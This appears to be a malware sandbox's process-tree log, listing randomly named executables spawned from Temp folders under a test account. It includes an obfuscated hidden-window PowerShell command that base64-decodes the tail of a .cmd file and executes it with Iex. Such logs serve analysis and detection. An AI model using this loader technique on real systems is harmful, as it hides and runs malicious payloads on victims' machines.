hvof1h0.exe "C:\Windows\Temp\{3C00F4D4-05FB-4560-8F0E-1E24C5F0A8D1}\.cr\hvof1h0.exe" -burn.clean.room="C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe" -burn.filehandle.attached=304 -burn.filehandle.self=312
29327cde3a8044.exe "C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe"
3024LAc2heq.exe "C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe"
1232Hmcm0Oj.exe "C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe"
2360xztOH3r.exe "C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe"
1156eZp5zCz.exe "C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe"
1692cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd"
2200cmd.exe Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
2796powershell.exe PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
2788i5Kz53x.exe "C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe"
3056235T1TS.exe "C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe"
20282W7420.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2W7420.exe
2296explorer.exe C:\Windows\Explorer.EXE
1236